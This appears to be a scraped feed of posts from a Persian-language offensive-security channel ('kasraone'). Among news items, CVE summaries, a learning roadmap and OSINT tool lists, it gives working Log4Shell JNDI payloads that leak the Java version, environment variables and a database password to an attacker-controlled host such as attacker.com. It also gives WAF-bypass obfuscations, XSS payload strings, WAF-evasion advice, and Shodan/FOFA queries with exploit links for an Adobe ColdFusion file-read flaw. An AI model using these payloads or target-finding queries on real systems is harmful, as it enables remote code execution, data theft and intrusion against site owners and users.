🔴 Log4Shell


CVE-2021-44228 Log4Shell



🔴 Apache Log4j2 <=2.14.1


Payloads

Java
# Identify Java version and hostname
${jndi:ldap://${java:version}.domain/a}
${jndi:ldap://${env:JAVA_VERSION}.domain/a}
${jndi:ldap://${sys:java.version}.domain/a}
${jndi:ldap://${sys:java.vendor}.domain/a}
${jndi:ldap://${hostName}.domain/a}
${jndi:dns://${hostName}.domain}

# More enumerations keywords and variables
java:os
docker:containerId
web:rootDir
bundle:config:db.password



🔴WAF Bypass


${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a}

# using lower and upper
${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc}
${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}

# using env to create the letter
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}



        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

🔴 MEDIUM


Web Application Firewall (WAF) Evasion Techniques


🔴 LINK


        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

بایپس باگ XSS

<A
HREF="http://66.102.7.147/">XSS</A>0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"veris-->group<svg/onload=alert(/XSS/)//#"><img src=M onerror=alert('XSS');>



        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

Git Hub 🐈

Tools bypass
Gema

Neam :
FabricBlockedServersBypass

Link


        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

🔴 XSS

Payload: "><A%20%252F=""Href=%20JavaScript:k=%27a%27,topk%2B%27lert%27>

        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

🔴Ethical-hacking-Roadmap & bug hunting RoadmapKasraone


Computer Fundamentals

https://www.comptia.org/training/by-certification/a
https://www.youtube.com/watch?v=tIfRDPekybU
https://www.tutorialspoint.com/computer_fundamentals/index.htm
https://onlinecourses.swayam2.ac.in/cec19_cs06/preview
https://www.udemy.com/course/complete-computer-basics-course/
https://www.coursera.org/courses?query=computer%20fundamentals

Computer Networking

https://www.youtube.com/watch?v=0AcpUwnc12E&list=PLkW9FMxqUvyZaSQNQslneeODER3bJCb2K
https://www.youtube.com/watch?v=qiQR5rTSshw -https://www.youtube.com/watch?v=L3ZzkOTDins
https://www.udacity.com/course/computer-networking--ud436
https://www.coursera.org/professional-certificates/google-it-support
https://www.udemy.com/course/introduction-to-computer-networks/
NetworkChuck: https://www.youtube.com/c/NetworkChuck

Operating Systems

https://www.youtube.com/watch?v=z2r-p7xc7c4
https://www.youtube.com/watch?v=_tCY-c-sPZc
https://www.coursera.org/learn/os-power-user
https://www.udacity.com/course/introduction-to-operating-systems--ud923
https://www.udemy.com/course/linux-command-line-volume1/
https://www.youtube.com/watch?v=v_1zB2WNN14

Command Line

Windows:
https://www.youtube.com/watch?v=TBBbQKp9cKw&list=PLRu7mEBdW7fDTarQ0F2k2tpwCJg_hKhJQ
https://www.youtube.com/watch?v=fid6nfvCz1I&list=PLRu7mEBdW7fDlf80vMmEJ4Vw9uf2Gbyc_
https://www.youtube.com/watch?v=UVUd9_k9C6A

Linux:

https://www.youtube.com/watch?v=fid6nfvCz1I&list=PLRu7mEBdW7fDlf80vMmEJ4Vw9uf2Gbyc_
https://www.youtube.com/watch?v=UVUd9_k9C6A -
https://www.youtube.com/watch?v=GtovwKDemnI
https://www.youtube.com/watch?v=2PGnYjbYuUo
https://www.youtube.com/watch?v=e7BufAVwDiM&t=418s
https://www.youtube.com/watch?v=bYRfRGbqDIw&list=PLkPmSWtWNIyTQ1NX6MarpjHPkLUs3u1wG&index=4

Programming

C
https://www.youtube.com/watch?v=irqbmMNs2Bo
https://www.youtube.com/watch?v=ZSPZob_1TOk
https://www.programiz.com/c-programming
Python
https://www.youtube.com/watch?v=ZLga4doUdjY&t=30352s
https://www.youtube.com/watch?v=gfDE2a7MKjA
https://www.youtube.com/watch?v=eTyI-M50Hu4
JavaScript
https://www.youtube.com/watch?v=-lCF2t6iuUc
https://www.youtube.com/watch?v=hKB-YGF14SY&t=1486s
https://www.youtube.com/watch?v=jS4aFq5-91M
PHP
https://www.youtube.com/watch?v=1SnPKhCdlsU
https://www.youtube.com/watch?v=OK_JCtrrv-c
https://www.youtube.com/watch?v=T8SEGXzdbYg&t=1329s

Where to learn from?

Books

Web Application Hacker's Handbook: https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470
Real World Bug Hunting: https://www.amazon.in/Real-World-Bug-Hunting-Field-Hacking-ebook/dp/B072SQZ2LG
Bug Bounty Hunting Essentials: https://www.amazon.in/Bug-Bounty-Hunting-Essentials-Quick-paced-ebook/dp/B079RM344H
Bug Bounty Bootcamp: https://www.amazon.in/Bug-Bounty-Bootcamp-Reporting-Vulnerabilities-ebook/dp/B08YK368Y3
Hands on Bug Hunting: https://www.amazon.in/Hands-Bug-Hunting-Penetration-Testers-ebook/dp/B07DTF2VL6
Hacker's Playbook 3: https://www.amazon.in/Hacker-Playbook-Practical-Penetration-Testing/dp/1980901759
OWASP Testing Guide: https://www.owasp.org/index.php/OWASP_Testing_Project
Web Hacking 101: https://www.pdfdrive.com/web-hacking-101-e26570613.html
OWASP Mobile Testing Guide :https://www.owasp.org/index.php/OWASP_Mobile_Security_Testing_Guide

Writeups

Medium: https://medium.com/analytics-vidhya/a-beginners-guide-to-cyber-security-3d0f7891c93a
Infosec Writeups: https://infosecwriteups.com/?gi=3149891cc73d
Hackerone Hacktivity: https://hackerone.com/hacktivity
Google VRP Writeups: https://github.com/xdavidhu/awesome-google-vrp-writeups

Blogs and Articles

Hacking Articles: https://www.hackingarticles.in/
Vickie Li Blogs: https://vickieli.dev/
Bugcrowd Blogs: https://www.bugcrowd.com/blog/



        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

🔴دور زدن WAF وب سایت

خوب سلام درود
به تمامی کاربران عزیز کسری وان امیدوارم حالتون عالی باشه این بار میخواهیم درباره دورزدن WAF وب سایت صحبت کنیم

حمایت یادتون نره

برای دور زدن WAF (Web Application Firewall) یک وب سایت، باید اقدامات امنیتی خاصی را انجام دهید. البته توجه داشته باشید که دور زدن WAF یک فعالیت غیرقانونی است و ممکن است منجر به پیامدهای قانونی شدیدی شود. در اینجا توضیحاتی برای اهداف آموزشی ارائه می‌شود:

1. استفاده از تکنیک‌های مخرب: برخی حملات مانند حملات از نوع SQL Injection، Cross-Site Scripting (XSS)، و Command Injection می‌توانند به شما کمک کنند تا WAF را دور بزنید. با این حال، توجه داشته باشید که انجام این حملات تخلف قانونی است.

2. استفاده از تغییر IP: اگر IP شما در لیست سیاه WAF قرار گرفته است، می‌توانید از VPN یا پروکسی استفاده کنید تا آدرس IP خود را تغییر دهید و به وب سایت دسترسی پیدا کنید.

3. استفاده از پروکسی‌های متحرک: برخی پروکسی‌ها و تکنولوژی‌های مشابه می‌توانند به شما کمک کنند تا WAF را دور بزنید.

4. شناسایی ضعف‌های WAF: با بررسی نحوه عملکرد WAF و شناسایی ضعف‌های آن، ممکن است بتوانید روش‌های دور زدن را پیدا کنید.



5استفاده از سینتکس JSON در payload‌های تزریقی SQL می‌تواند به شما کمک کند تا WAF را دور بزنید. زیرا بسیاری از WAF‌ها برای تشخیص حملات SQLi به دنبال الگوهای خاصی می‌گردند که در payload‌های SQLi وجود دارد. با اضافه کردن سینتکس JSON به payload، ممکن است WAF نتواند به درستی تشخیص حمله را انجام دهد و اجازه ورود payload به سیستم را بدهد.


توجه داشته باشید که دور زدن WAF یک عمل غیرقانونی است و ممکن است به شما مشکلات قانونی و امنیتی جدی وارد کند. بهترین راه برای حفظ امنیت وب سایت خود، استفاده از روش‌های امنیتی قوی و همچنین همکاری با تیم امنیت اطلاعات خود است.



        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

دوستان به دلیل اینکه کاربران خارجی پیام دادند
که پست ها به زبان انگلیسی بزاریم به نظره شما
اینطور باشد
نظره خود را با ما در میان بگذارید ممنون ❤

پست جدید حمایت یادتون نره ممنون


https://vrgl.ir/PHnLd

        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

🔴 CVE

CVE-2024-1750


یک آسیب پذیری که به عنوان بحرانی طبقه بندی شده بود، در TemmokuMVC تا 2.3 یافت شد.

تابع get_img_url/img_replace


در کتابخانه lib/images_get_down.php کامپوننت Image Download Handler تحت تأثیر قرار گرفته است. دستکاری منجر به سریال زدایی می شود. امکان انجام حمله از راه دور وجود دارد. پیچیدگی یک حمله نسبتاً زیاد است. گفته می شود که قابلیت بهره برداری دشوار است. این سوء استفاده برای عموم فاش شده است و ممکن است مورد استفاده قرار گیرد. شناسه این آسیب پذیری VDB-254532 است.

توجه: با فروشنده در مورد این افشای اولیه تماس گرفته شد اما به هیچ وجه پاسخ نداد.

این آسیب پذیری قابل بهره برداری از راه دور است و پیچیدگی حمله نسبتاً زیاد است

        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

ActiveScan++

ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead, it identifies application behaviour that may be of interest to advanced testers:

Potential host header attacks (password reset poisoning, cache poisoning, DNS rebinding)

Edge Side Includes

XML input handling

Suspicious input transformation (eg 7*7 => '49', \\ => '\' )

Passive-scanner issues that only occur during fuzzing (install the 'Error Message Checks' extension for maximum effectiveness)


ActiveScan++

قابلیت های اسکن فعال و غیرفعال Burp Suite را گسترش می دهد. این برنامه برای اضافه کردن حداقل هزینه های شبکه طراحی شده است و رفتار برنامه ای را که ممکن است برای تست کنندگان پیشرفته جالب باشد ، شناسایی می کند:

حملات هدر میزبان بالقوه (مسمومیت با تنظیم مجدد رمز عبور ، مسمومیت با حافظه پنهان، پیوند مجدد DNS)
لبه سمت شامل
مدیریت ورودی XML
تبدیل ورودی مشکوک (به عنوان مثال 7*7 => '49', \\ => '\' )
مشکلات اسکنر غیرفعال که فقط در طول فازینگ رخ می دهد (برای حداکثر اثربخشی ، افزونه "بررسی پیام خطا" را نصب کنید)

LINK TOOLS


         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ ˢʰᵃʳᵉ

                        K1
                  kasraone

🔴 XSS

CVE-2024-27959

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wpexpertsio WC Shop Sync – Integrate Square and WooCommerce for Seamless Shop Management allows Reflected XSS.This issue affects WC Shop Sync – Integrate Square and WooCommerce for Seamless Shop Management: from n/a through 4.2.9.


LINK

         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

🔴 Cross-site scripting (XSS)

🔴 COD XSS SAMPEL

🔴 VIDEO

''
1- <video controls ondurationchange=alert(1)><source src=validvideo.mp4 type=video/mp4></video>


2- <video src/onerror=alert(1)>


3- <video id=x controls onfocus=alert(1)><source src="validvideo.mp4" type=video/mp4></video>


4- <video onloadeddata=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>

''

نمونه های دیگر در لیست گیت های قرار میگیرد به زودی


         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌  ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

فرا رسیدن سال نو
که می‌تواند آغازی برای موفقیت،
کامیابی و بهترین‌ها باشد

بر شما مبارک❤️


شرکت کسری ارتباط پارس kasraone



         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌  ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

🔴شبکه فیشینگ دارکولا از RCS و iMessage برای فرار از تشخیص استفاده می کند


یک پلتفرم پیچیده فیشینگ به عنوان یک سرویس (PhaaS) به نام دارکولا ، سازمان‌هایی را در بیش از 100 کشور جهان با بهره‌گیری از شبکه‌ای عظیم از بیش از 20000 دامنه تقلبی برای کمک به مجرمان سایبری در راه اندازی حملات در مقیاس، هدف قرار داده است.


نت کرافت گفت : «استفاده از iMessage و
RCS به جای پیامک برای ارسال پیام‌های متنی عواقب جانبی دور زدن فایروال‌های SMS را دارد که برای هدف قرار دادن USPS همراه با خدمات پستی و سایر سازمان‌های تاسیس شده در بیش از
100 کشور استفاده می‌شود.»

Darcula در چندین حمله فیشینگ با مشخصات
بالا در سال گذشته به کار گرفته شده است، که در آن پیام‌های smishing برای کاربران اندروید و iOS در بریتانیا ارسال می‌شود، علاوه بر آن پیام‌هایی که تحویل بسته‌ها را با جعل هویت سرویس‌های قانونی مانند USPS فریب می‌دهند.




         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌  ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

CVE-2024-20767 -

Arbitrary file system read using an Improper Access Control vulnerability in Adobe ColdFusion


سیستم فایل دلخواه با استفاده از یک آسیب پذیری کنترل دسترسی نامناسب
در Adobe ColdFusion
خوانده می شود

Query:

Hunter: product.name="Adobe ColdFusion"
FOFA: app="Adobe-ColdFusion"
SHODAN: http.component:"Adobe ColdFusion"



Exploit:

https://github.com/yoryio/CVE-2024-20767
https://github.com/Chocapikk/CVE-2024-20767



Blog:

https://jeva.cc/2973.html




         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌  ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

⚙️ مقدمه ای بر Bypassing Hooks EDR

این مقاله روش‌های دور زدن قلاب‌های EDR در حالت کاربر سیستم عامل ویندوز را بررسی می‌کند و با توضیح فراخوانی‌های سیستم و نقش آنها در انتقال بین حالت‌های کاربر و هسته شروع می‌شود. متعاقباً، تکنیک‌های مختلفی برای دور زدن قلاب‌ها، از جمله سیستم‌های مستقیم و غیرمستقیم، همراه با مزایا و محدودیت‌های بالقوه آن‌ها در هنگام استفاده از مکانیسم‌های حفاظتی مورد بحث قرار می‌گیرند.

🔗 https://malwaretech.com/2023/12/an-introduction-to-bypassing-user-mode-edr-hooks.html




         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌  ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

eset/nimfilt
مجموعه ای از ماژول ها و اسکریپت ها برای کمک به تجزیه و تحلیل باینری های Nim


Git Hub 🐈

🔗: https://github.com/eset/nimfilt



         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌  ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

💻Research تحقیق دامنه و Ip

• Accuranker
• ahrefs - A tool for backlink research, organic traffic research, keyword research, content marketing & more.
• Alexa
• Bing Webmaster Tools
• BuiltWith
• Central Ops
• Dedicated or Not
• DNSDumpster
• DNS History
• DNSStuff
• DNSViz
• Domain Big Data
• Domain Crawler
• Domain Dossier
• Domain History
• Domain Tools - Whois lookup and domain/ip historical data.
• Easy whois
• Exonera Tor - A database of IP addresses that have been part of the Tor network. It answers the question whether there was a Tor relay running on a given IP address on a given date.
• Follow.net
• GraphyStories
• HypeStat
• Infosniper
• intoDNS
• IP Checking
• IP Location
• IP 2 Geolocation
• IP 2 Location
• IPFingerprints
• IPVoid - IP address toolset.
• IntelliTamper
• Kloth
• NetworkTools
• Majestic
• MaxMind
• MXToolbox - MX record lookup tool.
• Netcraft Site Report
• OpenLinkProfiler
• Open Site Explorer
• PageGlimpse
• Pentest-Tools.com
• PhishStats
• Pulsedive
• Quantcast
• Quick Sprout
• RedirectDetective
• Remote DNS Lookup
• Robtex
• Spyse - Scans entire internet using OSINT and collects all valuable info in its own database: Ipv4 hosts, domains/Meta/Whois, AS, TLS/SSL, Ports/Banners/Protocols, technologies, OS and much other info.
• SameID
• SecurityTrails - API to search current and historical DNS records, current and historical WHOIS, technologies used by sites and whois search for phone, email, address, IPs etc.
• SEMrush
• SEO Chat Tools
• SEOTools for Excel
• Similar Web - Compare any website traffic statistics & analytics.
• SmallSEOTools
• StatsCrop
• Squatm3gator - Enumerate available domains generated modifying the original domain name through different cybersquatting techniques
• TCPIPUTILS.com
• urlQuery
• URLVoid - Analyzes a website through multiple blacklist engines and online reputation tools to facilitate the detection of fraudulent and malicious websites.
• Wappalyzer
• WebMeUp
• Website Informer
• WhatIsMyIPAddress
• Who.is - Domain whois information.
• Whois Arin Online
• WhoIsHostingThis
• WhoisMind
• Whoisology
• WhoIsRequest
• w3snoop
• Verisign
• ViewDNS.info
• You Get Signal



         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌  ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

جایزه 5500 دلاری برای آسیب‌پذیری تزریق تایید نشده SQL در پلاگین وردپرس LayerSlider وصله شده است.



Link News




         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌  ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone

فهرستی از منابع (کتاب، آموزش، دوره ها، ابزارها
و برنامه های کاربردی آسیب پذیر) برای یادگیری
در مورد توسعه Exploit


Link News



         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌  ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone